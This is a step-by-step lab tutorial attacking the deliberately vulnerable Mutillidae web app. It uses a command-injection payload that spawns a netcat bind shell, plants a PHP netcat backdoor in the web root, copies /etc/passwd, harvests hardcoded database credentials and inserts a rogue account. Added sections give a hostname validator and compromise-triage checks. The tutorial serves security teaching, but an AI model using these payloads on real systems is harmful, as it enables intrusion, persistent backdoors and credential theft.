{ Command Injection Netcat Session }
Section 0. Background Information |
- What is Mutillidae?
- OWASP Mutillidae II is a free, open source, deliberately vulnerable web application providing a target for web-security enthusiasts.
- What is Command Injection?
- Command Injection occurs when an attacker is able to run operating system commands or server-side scripts from the web application. This vulnerability can occur when a web application lets you run utilities such as nslookup, whois, ping, traceroute and more from its webpage. You can test for the vulnerability by using a technique called fuzzing, where a ";" or "|" or "||" or "&" or "&&" is appended to the end of the expected input (e.g., www.cnn.com) followed by a command (e.g., cat /etc/passwd).
- What is netcat?
- Netcat is a computer networking utility for reading from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable "back-end" device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of connection you would need and has a number of built-in capabilities. Netcat is often referred to as a "Swiss-army knife for TCP/IP". Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.
- Pre-Requisite Lab
- Mutillidae: Lesson 1: How to Install Mutillidae in Fedora
- Note: Remote database access has been turned on to provide an additional vulnerability.
- BackTrack: Lesson 1: Installing BackTrack 5
- Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.
- Lab Notes
- In this lab we will do the following:
- Execute netcat using the command injection/execution vulnerability.
- Create a netcat backdoor outside of the command injection vulnerability.
- Conduct PHP Reconnaissance
- Conduct Database Reconnaissance
- Add a user to the nowasp.accounts table.
- Legal Disclaimer - Do not practice on targets that you are not authorized to test.
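The fuzzing test described under "What is Command Injection?" works because the input field is trusted to contain only a hostname. The following is an added example, not Mutillidae's code or part of the original lab: an allow-list hostname check that rejects each separator named above. The function names are hypothetical.

```shell
#!/bin/sh
# Added example, not Mutillidae code: allow-list check for a DNS lookup field.

# is_valid_hostname NAME -> status 0 only for a plain RFC 1123 hostname.
# The body runs in a subshell "( ... )" so LC_ALL, IFS and the positional
# parameters it changes do not leak into the caller.
is_valid_hostname() (
    LC_ALL=C
    name=$1
    [ -n "$name" ] || return 1
    [ "${#name}" -le 253 ] || return 1
    # Allow-list: letters, digits, dot, hyphen. Rejects ; | & space $ ( ) `
    # and newlines in one test, instead of trying to list "bad" characters.
    case $name in
        *[!A-Za-z0-9.-]*) return 1 ;;
    esac
    # No empty labels: leading dot, trailing dot, or two dots in a row.
    case $name in
        .* | *. | *..*) return 1 ;;
    esac
    # Each label: at most 63 characters, no leading or trailing hyphen
    # (a leading hyphen on the first label would also look like an option).
    IFS=.
    set -- $name    # unquoted on purpose; only [A-Za-z0-9.-] can be present
    for label in "$@"; do
        [ "${#label}" -le 63 ] || return 1
        case $label in
            -* | *-) return 1 ;;
        esac
    done
    return 0
)

# safe_lookup NAME: validate first, then pass NAME as one quoted argument,
# so the value is a single argv entry and is never re-parsed as shell syntax.
safe_lookup() {
    if ! is_valid_hostname "$1"; then
        echo "rejected: not a hostname" >&2
        return 2
    fi
    nslookup "$1"
}

# Constructed inputs: the expected value, then that value with each separator
# from the background section appended.
for input in 'www.cnn.com' 'www.cnn.com;id' 'www.cnn.com|id' \
             'www.cnn.com||id' 'www.cnn.com&id' 'www.cnn.com&&id'; do
    if is_valid_hostname "$input"; then verdict=accept; else verdict=reject; fi
    printf '%-20s %s\n' "$input" "$verdict"
done
```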
Section 1. Configure Fedora14 Virtual Machine Settings |
- Open Your VMware Player
- Instructions:
- On Your Host Computer, Go To
- Start --> All Programs --> VMWare --> VMWare Player
- Edit Fedora Mutillidae Virtual Machine Settings
- Instructions:
- Highlight fedora14
- Click Edit virtual machine settings
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v5CBuvyc4pkRSq0ccIsVsxe779sHcxGvqrWbsa9Orp98ohf-p5F1IlhTMsA7oMbw0qFSfEtEf1949JI8LTbYVE7P-WBzMQBrZN0H5ntYe8XIXUUe3Ywy2L1BG3qv2iD3Qs4Kxou_PQ_dIyyitPiRlPG_sox31juNk0pTtrfNJNxGLZLualwAc=s0-d)
- Edit Network Adapter
- Instructions:
- Highlight Network Adapter
- Select Bridged
- Click the OK Button
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_veGFpL3rXip9IcUAdALAn0KrU2zuTsul-GOAJ1HA9tiDUHCniJJFOB_ogidmyzKgRL3A8jARDb9r-Bu4Sr3KmVqzm4bIGugxUeet00X-9L3y7XCZNKqXbd1sdrr70BQaL_-Mn_Qu2SCq8UA7WsKMTsFCXo73T0aAwRnD0JhgSCxMEeMi9jH9A=s0-d)
Section 2. Login to Fedora14 - Mutillidae |
- Start Fedora14 VM Instance
- Instructions:
- Start Up VMWare Player
- Select Fedora14 - Mutillidae
- Play virtual machine
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tgngWJ6Z4fQFAUTzG8zM2AQ5rdRnM-lKAjmvFSpY2y9XKKwbdzmbzzTOScPsHiDKzBBYew1rXiLjBEwEgs-oLN2iL_Yr1fX4Vch02XG7XnfaUm8DCl7KTldWBPKoFPhM960h21nny74Cd-kIZ70I3RQ8mONhZIXmWNXUauAIo7BOqL-COKrDn08g=s0-d)
- Login to Fedora14 - Mutillidae
- Instructions:
- Login: student
- Password: <whatever you set it to>.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sCGVGtiOPzzZp_c1LOg1Z5IFz2o9W3hjqj0Z4ZDSmTkYz8V57MPFdKURdDEwwr4rI_t9G99VpjUSQnWW2OqbQ_1W0wUqJrs1-6wQ6IEpqVLrRIzd8dByd9w4lvLoukU7QJJhh0mFfSV0V5ubjTZO5zgmPMwdU_pUM_5W-KkVYol15sinQkyhnRYw=s0-d)
Section 3. Open Console Terminal and Retrieve IP Address |
- Start a Terminal Console
- Instructions:
- Applications --> Terminal
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_smPxe1o41EFBmi2puBidYYnWD9Y90OUzQHvijIYJONAqrFCSHhPjlePfxHuPxlEsQLpQ7O8GPOBDGYskan6o3Ttfh59iANcJjegHds1LzT9m548mYipYfY5uobpilqL0o-VJpHBwtYgVn3RT7qejb-Xvuy-Q7Zidfn26sFeJKnZnmE-EGwNmPkqQ=s0-d)
- Switch user to root
- Instructions:
- su - root
- <Whatever you set the root password to>
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sOYYvN9mWZmI7hTWBIcvHbkhqEoMD5tFb7VcWWY9XzdjJgku3595_cbzaZEbAkGAwqcIN4IJ74p08gFY5APN2jFcW3E26LTP19trAphWIJ2HVNRDUACbgcbMZHQSgFAbQZcnqHf46CsK6St0UUu6rCJ7-lrbxRWYFR7i6ziKc08BVPEYbA3fshgA=s0-d)
- Get IP Address
- Instructions:
- ifconfig -a
- Notes (FYI):
- As indicated below, my IP address is 192.168.1.111.
- Please record your IP address.
Section 4. Configure BackTrack Virtual Machine Settings |
- Edit the BackTrack5R1 VM
- Instructions:
- Select BackTrack5R1 VM
- Click Edit virtual machine settings
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vIidFVFg5TwhAn5anWnFxIh6YRLxHxlfhmga6v4ccxzqKg54Z6rvCTIil0JOeFIXaQLXXWEm3V-QdUGBii_4oPhDx3NBIUR1MpMjuPfoujuwQ4AM8EfXXVhVejqYNs-I_WUQdlkRx4Ie37Fae_Rc1PZs7i7Vaf_aEcJnm6_zK8GuiSDY9iWHY=s0-d)
- Edit Virtual Machine Settings
- Instructions:
- Click on Network Adapter
- Click on the Bridged Radio button
- Click on the OK Button
Section 5. Play and Login to BackTrack |
- Play the BackTrack5R1 VM
- Instructions:
- Click on the BackTrack5R1 VM
- Click on Play virtual machine
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tuS6_IRKjPE-kj74RF5DQxA7hJc8B1QbbyRHLStBI1NBkVX7MtCLUjoH0GAeNl1ZG8Q7orIEydy35bMm54L2GzaPr25E2CpJawgwJSkkHhCxlGVBOoAcj0vIlzLY4BBQ4W8Y4xsyWCEAEV2ARhUWDsVmAvRrheEPIH9QEftuXflzmi-sd3tFs=s0-d)
- Login to BackTrack
- Instructions:
- Login: root
- Password: toor or <whatever you changed it to>.
- Bring up the GNOME
- Instructions:
- Type startx
Section 6. Open Console Terminal and Retrieve IP Address |
- On BackTrack, Start up a terminal window
- Instructions:
- Click on the Terminal Window
- Obtain the IP Address
- Instructions:
- ifconfig -a
- Note(FYI):
- My IP address is 192.168.1.109.
- In your case, it will probably be different.
- This is the machine that will be used to attack the victim machine (Metasploitable).
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s9MpDHSFdd_dJZAiD0sDr8WJrSApPyg0zKPBgtgUMMNYUSBTt1hmjkuB0cIEb-kA_LHE3rg6Y1qYDg5XvR4Z_PzGcr4O46x4zXLeJTvZBuiMA3ihTXVbNPtuTcq3rcG8z3XCwXyeUv5dS15TCFoe1K1bppnqmJhsy1doLfgmquWMFuu5UZ1tQ=s0-d)
Section 7. Start Web Browser Session to Mutillidae |
- On BackTrack, Open Firefox
- Instructions:
- Click on the Firefox Icon
- Notes (FYI):
- If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tWzDe13R8tya6-ysSUzJCBSQkRrDzY-Cd5qrYK4t-qm9Ttqqsl-D7iO3dVJnIdFYb7KfACy_xYjBzpstlbuJ9IzaS6R0i2kMsdpOQ9CCreQ07FKvtkm_HcvHjZGGgSKm7C4xo0AIGu_2bhDlS8ulslQrlKYRFTGe3khb6dPbmR7Vls106tHCoX=s0-d)
- Open Mutillidae
- Notes (FYI):
- Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
- http://192.168.1.111/mutillidae
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u8CvP4FcTG8ifbWQqRTiZS8ktCoMdaYbG3_S5xbIVk8R4ut8LBvDErjfFk92kWDpkVM-shp28kX8GG962TNEa1BAI1KrnRgrCQfBJJrtVIwX0rJQMXBtg4s5hRc4omHih4c9MMYpK90UC5cpzQsw59hM8YRRi_pNmh4WTKN0vIewSmiJ2td5iL=s0-d)
Section 8. Netcat Command Execution |
- Go to DNS Lookup
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Reflected (First Order) --> DNS Lookup
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tb6uNokt7r7I-MvvystKTk34JA-huKr3G-4q5rcoIVD6jItep0-kACAhK_ctR-q2rRnqIkjpnNIpJh-IRaDx5g1jcAGGqn8XWmv8U4aLxlKY-zh9i4ASTRWAxDdfWvfKijylif2zhTVIn_O29ROozvBMBLQ_LniynG4hO3yi2ly-KzRm-0JkBw=s0-d)
- Execute Netcat
- Notes(FYI):
- Below we are going to append NetCat to the basic nslookup test. :)
- Instructions:
- www.cnn.com;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
- Make a FIFO named pipe.
- Pipes allow separate processes to communicate without having been designed explicitly to work together.
- This will allow two processes to connect to netcat.
- nc -l 4444, tells netcat to listen and allow connections on port 4444.
- Click Lookup DNS
- Continue to next step
- Note: No results will be displayed to this webpage, please continue to next step.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vAp0Ay2HuFtTlbKQzNk5U4-7pTIuoeCy51RbMtvODRfbjzP6k_NOx268oByRr80lFPAsp17sTALPN22kOrs6z8Z9y_hXRjIPYaR_L3pu9IFesKMdfnAPzhh4i3TTLEAdwaaBc4doYPgnJmVgR4CTwURKVuPky42UmQvwV63Vy1U1zmEYizrKY=s0-d)
- Verifying Results
- Note(FYI):
- Notice in the upper left tab, there is a connection pin-wheel that constantly spins.
- Notice in the lower left corner, the status bar displays the message transferring data.
- Both of these messages are good signs that netcat is running and listening for a connection.
- Instructions:
- Continue to next section.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tNmNAiRohDEqtIzKKh4sBUHCYXr8thydFUA4ZScqDl5z5bR9nUjK2uDKpJh1apQKjqROKjI44tO6nPKjwFhx6oaeePZQGEmHhX-Zyu_B_txV6hMzRL-XsUDaOAg97Reqx_15HdRJtZrkmShe7AMs31QXSRD5oPJCeT7eZawm_Ao9CmaXao4pnM=s0-d)
Section 9. Connecting to Netcat |
- Connect to Netcat
- Notes(FYI):
- Implement the following instructions on the BackTrack VM
- Replace 192.168.1.111 with the Fedora(Mutillidae) IP Address obtained from (Section 3, Step 3).
- Instructions:
- nc 192.168.1.111 4444
- Use BackTrack to Connect to the Mutillidae Netcat session on port 4444
- hostname
- This is the hostname of the server that hosts DVWA.
- whoami
- Print the effective UserID.
- i.e., who am I connected as.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vn6W_xV-5OUfYcM9NGvyxEu7z3BnPZDRiMg-jZwkuHITF7PpPTSwwS4OqrmZlTtu1VpqaOiBmgjPGqWG3mGvXhwNYS37ppWHdFh7vtZ2qxlMxalCKMjzhYTI11iurtUewDYxHXKffeL-DCxXs93rfkiYkCYV8nELLusewZ_1iGYCUUgf8nd3hl=s0-d)
- Directory and Username Reconnaissance
- Notes (FYI):
- We already know that we connected as the apache user, but we also want to know what is our current working directory.
- Also, we want to know if we have the ability to create a file within the current working directory.
- Instructions:
- pwd
- Print the current working directory
- uname -a
- Print system information (eg., Operating System & Version, Kernel, etc).
- cat /etc/passwd > passwd.txt
- Create a passwd.txt file located in /var/www/html/mutillidae
- ls -l $PWD/passwd.txt
- List the passwd.txt file.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tu-u20S_yah3BEVGB4FoBsn91BJ4viawsgu0ZWJXbN1Ohmg_5_3EoC5ntUsGYZBtavnKOdPTPjYSdBdL9T8cJSbjJAnJEKfxKAEQNAS1ZAzs5zV8KXY45OjN4IzjEuQDtjnMSls22T_Px2YUr4xb0_tN9UgZ6ZeylmYZNR-QHc4X6FHzxXWSE=s0-d)
Section 10. Viewing /etc/passwd |
- Open New FireFox Tab
- Notes (FYI):
- Perform the following instructions on BackTrack's Firefox.
- Instructions:
- Click on the Green Plus to create a new tab
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t_0jRpTXhRcdGVqwNfv7PoEGWxylNw5j2Bfccfj7b-xFcOedQdj57jx_GLljQ1YkaOnVpi1K92IH707MM_REhH6HjbQidz0EAyzAHBFtnIPGqJyDjfkuoiTmINu09HajvxSC_6gCSc_k6MxWkAxrG2zLUrll6wPQ57CrD7SqEEFzRslqXTpU5Z=s0-d)
- View /etc/passwd
- Notes (FYI):
- Replace 192.168.1.111 with the Fedora (Mutillidae) IP Address obtained in (Section 3, Step 3).
- It is nice to be able to view the password file, but the real feat was to be able to create a file and view it on the apache webserver. (Prepare for some black magic).
- Instructions:
- Place the following link in the Address Bar.
- http://192.168.1.111/mutillidae/passwd.txt
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uuvHSg3mPzHkmAG-ptZEsftRyCi6zynUo8rBDYaHoNZNgtPKLXLsl36ZJ7VjdFQm9uG3f77xUwP_cVKY3uKdzC-THn6aU4Hf_XmdIrLYuUeRwnWfHLkEqQsEejPCKRJOu7wmmZzSmy0l9tABs0KLXk40WqlPy647ij8Ke_KGT4d74KpA3ZsrF-=s0-d)
Section 11. Create PHP Backdoor |
- Discover the Database Engine using the /etc/passwd file
- Notes (FYI):
- Perform the following instructions using your previous BackTrack Terminal Netcat session.
- We now know we can create a file on the Apache Webserver in the /var/www/html/mutillidae directory.
- Let's create a php script that will serve as a netcat backdoor without having to execute netcat using the nslookup command execution.
- Instructions:
- echo "<?php system(\"mkfifo /tmp/pipe2;sh /tmp/pipe2 | nc -l 3333 > /tmp/pipe2\"); ?>" > nc_connect.php
- ls -l $PWD/nc_connect.php
- chmod 700 nc_connect.php
- ls -l $PWD/nc_connect.php
- cat nc_connect.php
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t57xidfOzDglVytChW4UQtlo_qoLsFS1XSVC8IQd4Jo0ZBIYQYSKNX1BkRS_JcWfwXIOk2BNoFoH0je_a-bH9ZgoCEJWx0n7h11k733HA-aOWh4JVaNFjpSS6tEXw3STkcvv5ImZhsmV6RrNp2qkPqLHboojrZPjZMPivzU4C1UVElb4X7bD5i=s0-d)
- Execute nc_connect.php
- Notes (FYI):
- Perform the next steps in BackTrack's second Firefox tab.
- Replace 192.168.1.111 with the Fedora (Mutillidae) IP Address obtained in (Section 3, Step 3).
- Use the second Firefox tab that you previously viewed the /etc/passwd file with to execute the nc_connect.php script.
- Instructions:
- Place the following link in the Address Bar.
- http://192.168.1.111/mutillidae/nc_connect.php
- Continue to Next Step
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vDzJAxiNa5Cntv5s1XcSMXtZJuMtcNwfSIgm1KkZxLkkR5tAlSMdCbuU2rmWHkKfIoV443j5V-iOtNCWgGWIWql75prT5WOPC_k18m91kDflTM7_rJ6QlZBwVn0AoUEJVnGuQjsU8KuwSJO83QJFwnqZmlIxDpjBDV5EK8ytQ_Sx90cWM4yxId=s0-d)
- On BackTrack, Start up "another" terminal window
- Instructions:
- Click on the Terminal Window
- Viewing your netcat sessions
- Notes (FYI):
- This terminal window will be used to connect to the nc_connect.php netcat session.
- Replace 192.168.1.111 with the Fedora (Mutillidae) IP Address obtained in (Section 3, Step 3).
- Instructions:
- nc 192.168.1.111 3333
- whoami
- ps -eaf | egrep '(3333|4444)'
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tbJELc3fKZAMIr2H_8LuGGMBQNNA8wXeAKBNUE-Focvz_39Kv9iaH69C5CFdn49J2s3XtNE7bDH7hyNrYZJuotaVV805g7SdlQT4ZBxNmMcoRtxkxs-hDf0VI2f6-VRsZMp7r4GvQ7nnEZKIgJ9034l9ipUe-pZxBctB8c3NEiZc_hMp03CQaD=s0-d)
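From the defender's side, this section leaves three things on the web server: a PHP file written by the web server account that calls system(), a named pipe in /tmp, and a shell and netcat running as that account. The following added example (not part of the original lab; function names and the WEB_USER default are assumptions) shows triage checks for each, with a constructed ps sample.

```shell
#!/bin/sh
# Added example, not part of the lab: triage for the artifacts of this section.
# WEB_USER is an assumption: the account the web server runs as (apache here).
WEB_USER=${WEB_USER:-apache}

# php_owned_by WEBROOT [USER]: PHP files owned by the web server account.
# Deployed code is normally owned by root or a deploy account, so a file owned
# by the server's own account was written at runtime.
php_owned_by() {
    find "$1" -type f -name '*.php' -user "${2:-$WEB_USER}" -print
}

# php_calling_shell WEBROOT: PHP files that call a command-execution function.
# The leading character class skips method calls (->exec) and names such as
# curl_exec. This is a review list, not proof of compromise.
php_calling_shell() {
    find "$1" -type f -name '*.php' -exec grep -lE \
        '(^|[^A-Za-z0-9_>$])(system|exec|shell_exec|passthru|popen|proc_open)[[:space:]]*\(' \
        {} + || true
}

# fifos_in DIR: named pipes, which mkfifo leaves behind (e.g. in /tmp).
fifos_in() {
    find "$1" -type p -print
}

# shells_run_by [USER]: reads `ps -eo user,pid,ppid,args` output on stdin and
# prints rows where that account is running a shell or netcat.
shells_run_by() {
    awk -v u="${1:-$WEB_USER}" '
        $1 == u {
            n = split($4, path, "/")
            if (path[n] ~ /^(sh|bash|dash|nc|ncat|netcat)$/) print
        }'
}

# Constructed ps output for illustration (not captured from a real host).
shells_run_by apache <<'EOF'
USER       PID  PPID COMMAND
root      1201     1 /usr/sbin/httpd
apache    1310  1201 /usr/sbin/httpd
apache    2207  1310 sh /tmp/pipe2
apache    2208  1310 nc -l 3333
student   2300  2250 bash
EOF
```

On a live host the same function would be fed with `ps -eo user,pid,ppid,args | shells_run_by apache`.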
Section 12. PHP Script Interrogation |
- List all php scripts
- Notes (FYI):
- Perform the next steps in the nc_connect.php netcat terminal.
- Our next step is to try to figure out if any of the php scripts located under /var/www/html/mutillidae contain a database username and password.
- But, first, let's count all the php scripts and include files.
- Instructions:
- pwd
- This shows the current working directory to be /var/www/html/mutillidae.
- find * -name "*.php" | wc -l
- Count the number of php scripts located in the current working directory.
- find * -name "*.inc" | wc -l
- Count the number of php include files located in the current working directory.
- List all php scripts
- Notes (FYI):
- Now we are going to search each include file (*.inc) for the string "password" AND the strings "db" OR "database".
- Instructions:
- find * -name "*.inc" | xargs grep -i password | egrep -i '(db|database)'
- find * -name "*.inc", find all files with the *.inc extension in the current working directory.
- xargs, build and execute command lines from standard input
- grep -i password, ignore case and search for the string "password".
- egrep -i '(db|database)', ignore case and search for the strings "db" OR "database".
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vi6VG55WCv_WDGUCnUsyuS7pSeggXc3p_YESfgjUrF1OCOxHUI2uUGh05ehRSop-UIB9PpquchbGmuQMJhknIi3tcE9FQFoTZLTjcGsGx1QJ7zWRxmtOVRwAne2IcdKi4FNZmlAcUOlpZqamvmrF8Y8OmSmwA_UNbOCltvk_V_GNBWChYlrdZy=s0-d)
- Search php scripts for the string password
- Notes (FYI):
- Now we will search the 900+ php scripts for the string "password" AND the strings ("db" OR "database") AND the string "=".
- I will use head -8 to show only the first 8 lines, but feel free to remove the "| head -8" to see all the results.
- The name of the script that contains the database password is MySQLHandler.php.
- Instructions:
- find * -name "*.php" | xargs grep -i password | egrep -i '(db|database)' | grep "=" | head -8
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t3MzXNqopVpn000kCudpNyrrCDrqaCPkgyU9EsUQOux5OcP4oXD-z-AHEeIpp95KkKqRFeDveFShl_RMEfqZUMxPmU80UwWVemg8r-0WFGnvPA2V6TXDx1lzzAm1NLRYbyJza91CXN5GO8k7cmiqer-mnSADNSnp6FPNbkStVIVoXrsrF74V8=s0-d)
- Search MySQLHandler.php for authentication information
- Notes (FYI):
- Below I will search the MySQLHandler.php script for the strings (password OR username OR database) and the string "=".
- Notice the username (root), password (samurai), and database (nowasp) are listed in the results.
- Instructions:
- find * -name "MySQLHandler.php" | xargs egrep -i '(password|username|database)' | grep "=" | head -10
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vDX3E7zIlmguFlWn6Ra4UwpStiqSiheCSj0rxhH0bDYSN6bxP8n8qXYg0eq2U3L6XCMbXCXnf7i_FSefHK9hutddc9DsKP98ON60KWHhe-OFkh0Ry52ifa2fzhAGlj1YSjGedtemspgEp5JC0glBM1LS9U1ysDiQuOesL-mUhPQ3UGmAnmtzY=s0-d)
Section 13. Database Interrogation |
- Basic Database Interrogation
- Notes (FYI):
- Perform the next steps in the nc_connect.php netcat terminal.
- The below command shows you how to execute database commands in the netcat session.
- show databases, allows you to view all databases.
- use nowasp; show tables, means use the nowasp database and show its tables.
- Instructions:
- echo "show databases;" | mysql -uroot -psamurai
- echo "use nowasp; show tables;" | mysql -uroot -psamurai
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vg-mHSIt-ojvs-kTt5xl9wVLZvOylMK6FUX8NVwmSAJfoDf-Ko57KIHPdbLZhkZCRu9gTvPGYQHslNnWwsVhVkLzng2y9tVpHPpEz3LLYVEaHQ9_A3Tz4WECtS27mE3xi6EEc7hyn1R9AQ5cKG1W-YVjM8nmBVLhRg5B4WXCUVAlYz23Kdq0oa=s0-d)
- Interrogate the accounts table
- Notes (FYI):
- The below command shows you how to view the column fields of the accounts table.
- In addition, you will run a basic select statement to view the contents of the accounts table.
- Instructions:
- echo "use nowasp; desc accounts;" | mysql -uroot -psamurai
- echo "select * from nowasp.accounts;" | mysql -uroot -psamurai
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_voPPeOH5ZI4zS0ubfexQ1PtwJ647sTrHlqRUdV-H-G_0pwBREFsYMu4NrhMyInDl2tyQTUuoxmujO4PgHv8RxXXY_dlYmg1WErdocob6unN0loURdWgkbjANSuCjUHZTl5lV0MeqVdLYuA-QMsjNNb-FKNNHQZcaf-wpxb6ovYniGhuypish5_=s0-d)
- Create a new user in the accounts table
- Notes (FYI):
- The below command shows you how to create a new username using the MySQL insert command.
- Pay attention to the last record of your select statement results.
- Instructions:
- echo "insert into nowasp.accounts values (null,'hacker33','p4sSw0rd!','H4ck 4 fo0d','TRUE');" | mysql -uroot -psamurai
- echo "select * from nowasp.accounts;" | mysql -uroot -psamurai
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tfASsx1OJfHYjJsxl4IZqogq559mz2h1eaUV_cRIVIpMs8fsCbo_DBc-pTPCyiQzjhrFQvR_vN7nzdtTrBmhlTGGG--USoPSxlocvIP4qWYYIarDfyi_yTC0ajewiR_IZjTKuoVmLS33jB2szchNR0h0_oEd1SuyxrzJ-DwaMZf_pcaenQK5tj=s0-d)
- Proof of Lab
- Notes (FYI):
- Perform the next steps in the nc_connect.php netcat terminal
- Use nc_connect.php netcat session for the below directions.
- Instructions:
- echo "select * from nowasp.accounts where username = 'hacker33';" | mysql -uroot -psamurai
- netstat -nao | egrep '(3333|4444)'
- date
- echo "Your Name"
- Replace the string "Your Name" with your actual name.
- e.g., echo "John Gray"
- Proof of Lab Instructions:
- Do a PrtScn
- Paste into a word document
- Upload to website www.antoanthongtin.edu.vn
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u7YxXdpmvuJ6Nv2599aeIBfDZFaioF7Mdmnn9VlhGBEgWGanv1EBUeEdQvVtOVnmgth9jWCXjDHurjuU9gqyUZBVqOXXaGJLSpzHD2NuSVnaRqpz8QR8dsOnZDK1eM16m2lcax1SOv6t2l-8pbvEd0UzQuu1p806xjM7xi-V0mV_egLhczAJHS=s0-d)